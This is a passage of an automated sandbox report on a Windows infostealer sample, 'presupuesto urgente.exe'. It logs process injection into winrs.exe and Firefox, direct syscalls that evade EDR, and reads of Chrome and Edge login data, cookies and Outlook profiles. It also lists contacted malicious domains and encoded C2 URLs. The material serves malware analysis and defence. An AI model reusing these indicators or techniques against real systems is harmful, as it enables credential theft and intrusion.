        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtOpenFile: Direct from: 0x77AF2CECJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtAllocateVirtualMemory: Direct from: 0x77AF3BBCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtSetInformationThread: Direct from: 0x77AE6319Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQueryInformationToken: Direct from: 0x77AF2BCCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtReadVirtualMemory: Direct from: 0x77AF2DACJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQueryVolumeInformationFile: Direct from: 0x77AF2E4CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtDeviceIoControlFile: Direct from: 0x77AF2A0CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQuerySystemInformation: Direct from: 0x77AF47ECJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtCreateKey: Direct from: 0x77AF2B8CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtSetInformationThread: Direct from: 0x77AF2A6CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQueryAttributesFile: Direct from: 0x77AF2D8CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtProtectVirtualMemory: Direct from: 0x77AE7A4EJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtCreateFile: Direct from: 0x77AF2F0CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtAllocateVirtualMemory: Direct from: 0x77AF2B0CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtOpenSection: Direct from: 0x77AF2D2CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtOpenKeyEx: Direct from: 0x77AF2ABCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQueryInformationProcess: Direct from: 0x77AF2B46Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtResumeThread: Direct from: 0x77AF2EDCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtDelayExecution: Direct from: 0x77AF2CFCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtAllocateVirtualMemory: Direct from: 0x77AF480CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtClose: Direct from: 0x77AF2A8C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtCreateUserProcess: Direct from: 0x77AF363CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtProtectVirtualMemory: Direct from: 0x77AF2EBCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtWriteVirtualMemory: Direct from: 0x77AF482CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtWriteVirtualMemory: Direct from: 0x77AF2D5CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtMapViewOfSection: Direct from: 0x77AF2C3CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtResumeThread: Direct from: 0x77AF35CCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtAllocateVirtualMemory: Direct from: 0x77AF2B1CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtSetInformationProcess: Direct from: 0x77AF2B7CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtNotifyChangeKey: Direct from: 0x77AF3B4CJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtReadFile: Direct from: 0x77AF29FCJump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeNtQuerySystemInformation: Direct from: 0x77AF2D1CJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeThread register set: target process: 2460Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        1
        OS Credential Dumping
        121
        Security Software Discovery
        Remote Services1
        Email Collection
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts212
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism
        1
        Access Token Manipulation
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        212
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object Model1
        Clipboard Data
        5
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets3
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism
        Cached Domain Credentials14
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525571 Sample: presupuesto urgente.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 34 www.stayvact.xyz 2->34 36 www.99b6q.xyz 2->36 38 26 other IPs or domains 2->38 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 5 other signatures 2->54 10 presupuesto urgente.exe 1 28 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 13 presupuesto urgente.exe 6 10->13         started        process6 dnsIp7 40 drive.usercontent.google.com 142.250.176.193, 443, 49731 GOOGLEUS United States 13->40 42 drive.google.com 142.251.40.174, 443, 49730 GOOGLEUS United States 13->42 64 Maps a DLL or memory area into another process 13->64 17 qnFwqCOYxcUlZ.exe 13->17 injected signatures8 process9 dnsIp10 28 parkingpage.namecheap.com 91.195.240.19, 49732, 49765, 49766 SEDO-ASDE Germany 17->28 30 www.297tamatest1kb.com 162.255.119.150, 49761, 49762, 49763 NAMECHEAP-NETUS United States 17->30 32 8 other IPs or domains 17->32 44 Found direct / indirect Syscall (likely to bypass EDR) 17->44 21 winrs.exe 13 17->21         started        signatures11 process12 signatures13 56 Tries to steal Mail credentials (via file / registry access) 21->56 58 Tries to harvest and steal browser information (history, passwords, etc) 21->58 60 Modifies the context of a thread in another process (thread injection) 21->60 62 2 other signatures 21->62 24 firefox.exe 21->24         started        process14

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        presupuesto urgente.exe18%ReversingLabsWin32.Trojan.Generic
        presupuesto urgente.exe100%AviraHEUR/AGEN.1331786
        presupuesto urgente.exe23%VirustotalBrowse
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLink
        parkingpage.namecheap.com0%VirustotalBrowse
        drive.usercontent.google.com1%VirustotalBrowse
        www.drivemktg.co2%VirustotalBrowse
        www.dadayute.com0%VirustotalBrowse
        www.stayvact.xyz2%VirustotalBrowse
        www.297tamatest1kb.com8%VirustotalBrowse
        drive.google.com0%VirustotalBrowse
        www.eagleup.org2%VirustotalBrowse
        www.hedieplastic.com0%VirustotalBrowse
        star-web-prod-1839730.pages.dev1%VirustotalBrowse
        cdl-lb-1356093980.us-east-1.elb.amazonaws.com0%VirustotalBrowse
        www.inform-you.com1%VirustotalBrowse
        jennarauten.com1%VirustotalBrowse
        www.xn--fhq1c541j0zr.com0%VirustotalBrowse
        www.strategyvanguard.com2%VirustotalBrowse
        www.taketechai.com0%VirustotalBrowse
        www.jennarauten.com0%VirustotalBrowse
        www.gipsytroya.com9%VirustotalBrowse
        www.philippatston.com0%VirustotalBrowse
        www.helpers-lion.online0%VirustotalBrowse
        www.99b6q.xyz0%VirustotalBrowse
        www.ytfunnels.com0%VirustotalBrowse
        www.5597043.com0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com0%VirustotalBrowse
        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%VirustotalBrowse
        http://www.eagleup.org/71zx/1%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.taketechai.com.cdn.hstgr.net
        191.101.104.164
        truetrue
          unknown
          parkingpage.namecheap.com
          91.195.240.19
          truetrueunknown
          drive.usercontent.google.com
          142.250.176.193
          truefalseunknown
          www.sleephygienist.org
          13.248.169.48
          truetrue
            unknown
            www.drivemktg.co
            193.108.130.23
            truetrueunknown
            www.dadayute.com
            74.208.236.225
            truetrueunknown
            www.stayvact.xyz
            199.192.19.19
            truetrueunknown
            cdl-lb-1356093980.us-east-1.elb.amazonaws.com
            184.73.212.51
            truetrueunknown
            www.xn--fhq1c541j0zr.com
            43.252.167.188
            truetrueunknown
            jennarauten.com
            31.217.192.158
            truetrueunknown
            www.hedieplastic.com
            46.102.130.116
            truetrueunknown
            drive.google.com
            142.251.40.174
            truefalseunknown
            www.297tamatest1kb.com
            162.255.119.150
            truetrueunknown
            star-web-prod-1839730.pages.dev
            172.66.44.73
            truetrueunknown
            www.strategyvanguard.com
            185.134.245.113
            truetrueunknown
            www.eagleup.org
            unknown
            unknowntrueunknown
            www.inform-you.com
            unknown
            unknowntrueunknown
            www.seninbeniimikaf.buzz
            unknown
            unknowntrue
              unknown
              www.99b6q.xyz
              unknown
              unknowntrueunknown
              www.helpers-lion.online
              unknown
              unknowntrueunknown
              www.gipsytroya.com
              unknown
              unknowntrueunknown
              www.taketechai.com
              unknown
              unknowntrueunknown
              www.jennarauten.com
              unknown
              unknowntrueunknown
              www.5597043.com
              unknown
              unknowntrueunknown
              www.ytfunnels.com
              unknown
              unknowntrueunknown
              www.philippatston.com
              unknown
              unknowntrueunknown
              www.doodstream.beauty
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://www.eagleup.org/71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDTtrue
                  unknown
                  http://www.eagleup.org/71zx/trueunknown
                  http://www.297tamatest1kb.com/ko0y/true
                    unknown
                    http://www.taketechai.com/6s2u/true
                      unknown
                      http://www.philippatston.com/b2tl/true
                        unknown
                        http://www.297tamatest1kb.com/ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDTtrue
                          unknown
                          http://www.gipsytroya.com/w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&1X=S8wx1XUpNBuXlv_true
                            unknown
                            http://www.sleephygienist.org/9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDTtrue
                              unknown
                              http://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDTtrue
                                unknown
                                http://www.jennarauten.com/h9tv/true
                                  unknown
                                  http://www.ytfunnels.com/qrln/true
                                    unknown
                                    http://www.gipsytroya.com/w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&m2W4y=eLqP3zSpfDTtrue
                                      unknown
                                      http://www.sleephygienist.org/9ned/true
                                        unknown
                                        http://www.strategyvanguard.com/nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDTtrue
                                          unknown
                                          http://www.stayvact.xyz/44em/true
                                            unknown
                                            http://www.xn--fhq1c541j0zr.com/y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDTtrue
                                              unknown
                                              http://www.xn--fhq1c541j0zr.com/y6iz/true
                                                unknown
                                                http://www.hedieplastic.com/qlei/true
                                                  unknown
                                                  http://www.taketechai.com/6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDTtrue
                                                    unknown
                                                    http://www.hedieplastic.com/qlei/?PbG=1dhh/rR2+Ao8cSiudW9CEG89SOA5iCCmNAl/rU9Fzwpz0XQlGI+SqOP59XCH8flBSUq99zsbRoSQkEbtVQJkQy88E/1gHIIJW2hLrfVypywFJgwBZQbuFEw=&m2W4y=eLqP3zSpfDTtrue
                                                      unknown
                                                      http://www.philippatston.com/b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDTtrue
                                                        unknown
                                                        http://www.stayvact.xyz/44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDTtrue
                                                          unknown
                                                          http://www.gipsytroya.com/w8xy/true
                                                            unknown
                                                            http://www.strategyvanguard.com/nx20/true
                                                              unknown
                                                              http://www.eagleup.org/71zx/?aPfP=cNoDEx_hrvchZzh&PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=true
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://duckduckgo.com/chrome_newtabwinrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drfalseunknown
                                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchwinrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drfalseunknown
                                                                http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.comwinrs.exe, 00000004.00000002.12652275172.0000000005136000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                                                https://duckduckgo.com/ac/?q=16-84-3.4.drfalseunknown
                                                                https://drive.google.com/pYX)presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
